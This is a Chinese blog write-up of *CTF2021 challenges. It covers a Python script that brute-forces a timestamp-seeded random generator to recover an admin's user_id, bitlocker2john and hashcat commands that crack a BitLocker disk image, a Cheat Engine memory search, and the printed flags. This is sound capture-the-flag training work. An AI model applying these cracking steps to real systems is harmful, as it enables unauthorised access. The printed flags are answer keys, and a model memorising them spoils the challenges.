*CTF2021部分复现

最新推荐文章于 2023-08-16 14:29:31 发布
最新推荐文章于 2023-08-16 14:29:31 发布
阅读量1.4k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/112802285
版权

web

oh-my-note

在这里插入图片描述
从源码可以看出session 是经过两次随机进行设置,首先随机取得user_id,在通过user_id和提交的时间取得note_id

看到 view路由
在这里插入图片描述
可以发现我们可以通过这个公开页面获得note_id
在这里插入图片描述
网页中恰好也给到了admin 的note_id
在这里插入图片描述
而我们发现在my_notes 这个路由我们有两种方式看到提交的note
一种session,另一种是GET请求发送user_id
很明显,题目意思要求爆破user_id

创建用户和提交时间可能存在几毫秒的偏差
在这里插入图片描述
源码中采用的是UTC时间,
格林威治标准时间与北京时间差了8小时
因此在爆破时多加8,提交的时间是2点29
由此得出exp

import string
import random
import os
import datetime

def get_random_id():
    alphabet = list(string.ascii_lowercase + string.digits)
    return ''.join([random.choice(alphabet) for _ in range(32)])

for i in range(60):
    for j in range(10000):
        t = datetime.datetime(2021,1,15,10,29).timestamp()+i+j/10000
        timestamp=round(t,4)
        print(timestamp)
        random.seed(timestamp)
        user_id=get_random_id()
        post_at=datetime.datetime.fromtimestamp(timestamp,tz=datetime.timezone.utc).strftime('%Y-%m-%d %H:%M UTC')
        random.seed(user_id+post_at)
        note_id=get_random_id()
        if note_id =='lj40n2p9qj9xkzy3zfzz7pucm6dmjg1u':
            print(post_at)
            print(user_id)
            os._exit(0)


#7bdeij4oiafjdypqyrl2znwk7w9lulgn

在这里插入图片描述
flag就在my secret中

MISC

liitletricks

在这里插入图片描述
windows磁盘
在这里插入图片描述
010打开是vhdx文件

挂载后发现是个加密的磁盘
在这里插入图片描述

john
bitlocker2john
这个工具kali自带

bitlocker2john -i ll2.vhdx

在这里插入图片描述

在这里插入图片描述
这里采取第二种攻击方式
在这里插入图片描述
复制到hash当中去
hashcat
也可用john,但是hashcat更加快速
hashcat详细使用
得知Bitlocker是22100
在这里插入图片描述

hashcat.exe -m 22100 H:\XCTF\2021\startctf\misc\liitletricks\hash H:\web工具\字典\弱密码\pass.txt

在这里插入图片描述
得出密码12345678
在这里插入图片描述
里面啥也没用,试试磁盘恢复工具
用R-TUDIO恢复神器当然这里也可用DiskGenius
我之所以喜欢R-TUDIO,是因为他是免费,无论多大都能恢复
在这里插入图片描述
看到有个PDF
在这里插入图片描述
后面隐藏的就是flag
硬要拉出来也可以

转换网站

去上面那个网站转成ppt
在这里插入图片描述

MineGame

装好所需要的的工具后,打开是扫雷,但是过几秒会自动关闭
用外挂CE淦
在这里插入图片描述
将进程暂停,他就不会自动关闭了
然后用CE搜索字符串

先将*CTF用hex转换
在这里插入图片描述
这样搜
在这里插入图片描述

在这里插入图片描述

*CTF{Y0u_41e-gLeat_6Oy3!}
penson by 小乌
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf赛题secret.php,记一场纯JS赛——DiceCTF2021 Web题解
weixin_42509398的博客
03-12 748
// remake the `users` tabledb.exec( `DROP TABLE IF EXISTS users;`);db.exec( `CREATE TABLE users(id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT);`);// add an admin user with a random ...
AFCTF校赛
Huamang的博客
06-05 988
fake 留了一个.git文件,我们看一下日志 是有两次提交的,有一次是真的flag git log git show 版本号 我们再使用git show命令来查看内容 stolen 打开数据包,追踪tcp流 首先看到上传了一个一句话木马 然后是一个python文件 这个python文件把flag的每一位都转化成ascii码再*16*16+1 然后发送流给192.168.159.138 再往下看,他执行了这个python文件 那么就看他的包的内容,全部提取出来在转换成flag 第一个果然是26
2021-AFCTF
unexpectedthing的博客
04-17 2928
AFCTF search 考点 就是一个对find的命令了解,参数exec可以实现命令 wp payload /search.php?search=flag -exec cat {} \; google authenticator 考点 sql注入,拿到secret的密钥 google身份验证码的实现 蚁剑连接,无权限,进行信息收集 蚁剑反弹shell到vps 非交互式shell变为交互式shell的两种方式 写定时任务redis提权 wp 看到登录界面,扫一波,没有东西 尝试进行sql注入 先来个万
[SCUCTF]2021 校赛 Web题目复现
cosmoslin的博客
04-08 1976
web 1 入门 查看headers 2 shell <?php if(isset($_GET['eval'])){ $eval = $_GET['eval']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("$eval"); }else{ die("hacker??"); } }else{ highlight_file(__FILE__); } ?
2021 FDUCTF解题报告
qq_47903865的博客
10-16 2637
比赛链接 crypto BabyRSA 小Z学习了RSA算法,但他认为n只需要够大就行了,这合理吗? from Crypto.Util.number import * from secret import flag n=2**1024 e=65537 m=bytes_to_long(flag) c=pow(m,e,n) print(c) #987101149352846962667271870999743049151973302592726882767520095444948907940118459472
starctf2021:* CTF2021的官方源代码和内容
03-20
【标题】"starctf2021: CTF2021的官方源代码和内容"揭示了这是一份关于2021年CTF(Capture The Flag)比赛的资源包,其中包含了该赛事的源代码和相关资料。CTF是一种网络安全竞赛,参与者通常分为攻防两方,通过解谜...
*CTF 2023 Misc
07-30
**CTF 2023 Misc** CTF(Capture The Flag)是一种网络安全竞赛,参与者通过解谜、破解、分析和编程来解决各种信息安全问题。"Misc"通常代表混合类别,意味着这个CTF挑战包含了多种不同领域的知识,比如密码学、...
绿城杯 CTF 2021 真题 (1).rar
12-07
【绿城杯 CTF 2021 真题】是一个网络安全竞赛的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参赛者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比赛是一...
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts CTF 2021 是一个网络安全竞赛,主要针对网络安全爱好者和专业人士,旨在提升参赛者在信息安全领域的技能和知识。此类竞赛通常包括多种挑战,如逆向工程、密码学、网络取证、Web安全等。在这个特定的案例中,...
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
RACTF 2021 Web复现
feng的博客
08-19 1501
前言 最近向Y4师傅学习,慢慢开始打国外的比赛。13号-16号的RACTF当时看了一下做出来人数最多的Web题,发现一点头绪都没有,就直接爬了,感觉这个比赛可能难度挺大的。还是有些畏难了。今天早上看到Y4师傅发了这个比赛的WP,我又去官网上看了一下,部分的Web的WP也发了,而且题目环境也都没关,所以就又去做了一下,不会的Web题如果有wp的话也跟着wp学习了一下进行了复现。 Really Awesome Monitoring Dashboard 用的是Grafana v8.1.1,查了一下没找到这个版本的
【NepCTF2023】复现
最新发布
leekos的博客,分享web安全相关知识~
08-16 4095
复现完这题学到了很多关于内网中代理等知识,学到了venom工具构造socks5代理,使用proxifier的方式打开工具,有点像给系统加了一个代理。
[2022 ACTF]web题目复现
cosmoslin的博客
07-06 1596
查看dockerfile发现题目使用环境为goahead5.1.4,联想到p神对于该漏洞的复现记录,我们有两种方法解题:GoAhead环境变量注入复现踩坑记hack.c 编译 exp.py exp.py 简单看一下代码逻辑:server.js 整个题目通过websockets通信,当api为getflag时传入flagbot 这里发现admin登录没有任何限制,那么我们登录admin再传入getflag即可 原型链污染: xss: ToLeSion 考点: TLS-Poison 一篇文章带你读懂 TLS
CTF赛题下载、复现、解题方法
renxq097的博客
04-07 3628
CTF赛题下载、复现、解题方法 看过这篇文章,你将学会自己搭建大佬们在github中分享的赛题进行复现 我们以靶场其中的(web_gift)进行复现 一、操作系统准备 你需要一个linux操作系统并完成docker搭建。 系统:ubuntu 安装网上教程一大堆,这里推荐一个: https://www.cnblogs.com/liujiaxin2018/p/14207930.html 二、ubuntu搭建docker环境 网上搭建docker一堆坑,对新手很不友好,建议看官网的最新命令 更
MRCTF部分题的总结与复现
qwzf
04-10 9083
0x00 前言 题目整体来说不太难,毕竟是个新生赛。但考察的知识点等方面,确实需要总结一下。于是我总结了部分MISC、Crypto和Web。
[MRCTF 2022]web题目复现
cosmoslin的博客
04-27 1525
WEB webcheckin 一个文件上传点,可以上传webshell但是有检测,这里用二进制绕过 <?php class KUYE{ public $DAXW = null; public $LRXV = null; function __construct(){ $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 10011
NSFFCTF--CRYPTO(1~10)
m0_59022585的博客
07-12 474
4、设x=a+b=sqrt(a^2+b^2+2ab),y=a-b=sqrt(a^2+b^2-2ab),a=(x+y)/2,b=(x-y)/2。分析代码:生成p,q为400位的素数,且q前200位是p后200位,后200位是p前200位。将flag进行RSA加密输出c和n。解压后得到一串密文,密文中出现:K=,当:K=ASCII码值分别加9,对应为CTF,推测密文经过移位加密,使用脚本得到flag。注意:因为ab是400位,根据不等式a^2+b^2>=2ab,则a^2+b^2必为401位,且第一个数为1。
HFCTF-2021-Final-easyflask
snowlyzz的博客
09-04 725
flask_session
picoctf_2018_leak_me
weixin_51298357的博客
01-30 390
picoctf_2018_leak_me 反编译修复+满足条件后leak 0x01 ​ 这道题一开始F5不能显示伪代码。会显示又有个地方有问题,快捷键g输入有问题的地方的地址,然后点进去先反编译有问题的这个函数,然后再出来反编译整个函数就好了 0x02 查看程序里的函数 大体看一下程序,执行流:程序执行puts输出name → 输入password→password正确时得到flag main函数中fgets函数的地方存在漏洞 # -*- coding: utf-8 -*- from pwn
swpuctf 2021 新生赛]hardrce
07-28
很抱歉,我无法回答你的问题。 #### 引用[.reference_title] - *1* *2* *3* [[SWPUCTF 2021 新生赛] 第三波放题](https://blog.csdn.net/weixin_63231007/article/details/124086128)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值